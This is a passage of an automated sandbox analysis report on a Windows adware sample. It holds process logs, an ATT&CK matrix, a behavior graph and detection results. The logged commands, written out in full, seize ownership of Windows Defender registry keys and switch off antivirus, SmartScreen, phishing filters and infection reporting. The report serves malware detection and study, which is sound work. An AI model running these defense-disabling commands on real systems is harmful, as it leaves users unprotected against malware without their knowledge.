Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F80B70 SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,SetSecurityDescriptorSacl,GetLastError,MakeSelfRelativeSD,MakeSelfRelativeSD,MakeSelfRelativeSD,GetLastError,3_2_00F80B70
Source: PowerRun.exe.0.drBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: PowerRun64.exe.0.drBinary or memory string: ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,3_2_00F99760
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00F9A0C1
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: EnumSystemLocalesW,3_2_00F9A2C3
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: GetLocaleInfoW,3_2_00F9A806
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: EnumSystemLocalesW,3_2_00F99AE8
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: EnumSystemLocalesW,3_2_00F99A4D
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: EnumSystemLocalesW,3_2_00F99A02
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_00F99B73
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: GetLocaleInfoW,3_2_00F99DC6
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00F99EEC
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: GetLocaleInfoW,3_2_00F99FF2
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F8BC85 cpuid 3_2_00F8BC85
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F698F0 EnterCriticalSection,GetSystemTimeAsFileTime,GetCurrentThreadId,GetUserNameExW,GetLastError,GetUserNameExW,GetLastError,LeaveCriticalSection,LeaveCriticalSection,3_2_00F698F0
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeCode function: 0_2_004031F1 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004031F1
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F88D30 LookupAccountNameW,GetLastError,GetLastError,GetLastError,LookupAccountNameW,GetLastError,IsValidSid,IsValidSid,GetLengthSid,CopySid,Concurrency::cancel_current_task,3_2_00F88D30

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts12
Command and Scripting Interpreter		Path Interception1
Access Token Manipulation		1
Modify Registry		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		Exfiltration Over Other Network Medium1
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
System Shutdown/Reboot
Default Accounts1
Scripting		Boot or Logon Initialization Scripts12
Process Injection		1
Virtualization/Sandbox Evasion		LSASS Memory121
Security Software Discovery		Remote Desktop Protocol1
Clipboard Data		Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
Access Token Manipulation		Security Account Manager1
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)12
Process Injection		NTDS1
Process Discovery		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Deobfuscate/Decode Files or Information		LSA Secrets1
Account Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common1
Scripting		Cached Domain Credentials1
System Owner/User Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items2
Obfuscated Files or Information		DCSync2
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem34
System Information Discovery		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1284605 Sample: Ptmhbplhxb.exe Startdate: 02/08/2023 Architecture: WINDOWS Score: 60 30 Multi AV Scanner detection for dropped file 2->30 32 Multi AV Scanner detection for submitted file 2->32 7 Ptmhbplhxb.exe 29 2->7         started        process3 file4 22 C:\Users\user\AppData\...\pdzaicbnewkzt.exe, PE32 7->22 dropped 24 C:\Users\user\AppData\...\gafvvkhmsfjamrm.exe, PE32 7->24 dropped 26 C:\Users\user\AppData\Local\...\SetACL64.exe, PE32+ 7->26 dropped 28 4 other files (3 malicious) 7->28 dropped 34 Submitted sample is a known malware sample 7->34 11 cmd.exe 1 7->11         started        signatures5 process6 signatures7 36 Uses cmd line tools excessively to alter registry or file data 11->36 14 conhost.exe 11->14         started        16 SetACL32.exe 1 11->16         started        18 SetACL32.exe 1 11->18         started        20 37 other processes 11->20 process8

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Ptmhbplhxb.exe55%ReversingLabsWin32.Adware.Nemesis

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\nsq9535.tmp\PowerRun.exe32%ReversingLabsWin32.PUA.Generic
C:\Users\user\AppData\Local\Temp\nsq9535.tmp\PowerRun.exe32%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\nsq9535.tmp\PowerRun64.exe2%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsq9535.tmp\PowerRun64.exe4%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL64.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL64.exe0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\nsq9535.tmp\gafvvkhmsfjamrm.exe3%ReversingLabsWin32.Adware.Generic
C:\Users\user\AppData\Local\Temp\nsq9535.tmp\gafvvkhmsfjamrm.exe17%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\nsq9535.tmp\nsExec.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsq9535.tmp\nsExec.dll1%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\nsq9535.tmp\pdzaicbnewkzt.exe3%ReversingLabsWin32.Adware.Generic

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://helgeklein.com.0%VirustotalBrowse
https://helgeklein.com.0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://nsis.sf.net/NSIS_ErrorPtmhbplhxb.exefalse
    		high
    http://nsis.sf.net/NSIS_ErrorErrorPtmhbplhxb.exefalse
      		high
      https://helgeklein.com.SetACL32.exe, SetACL32.exe, 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.337990441.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.339317693.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.338670172.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.340772925.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.339891186.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.341509192.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.340983275.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.341713280.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.342214867.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.342983342.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.342556211.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.343532858.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.344356019.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.345325623.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.344643979.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://helgeklein.comSetACL32.exe, SetACL32.exe, 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.337990441.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.339317693.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.338670172.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.340772925.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.339891186.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.341509192.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.340983275.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.341713280.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.342214867.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.342983342.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.342556211.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.343532858.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.344356019.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.345325623.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.344643979.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drfalse
        		high
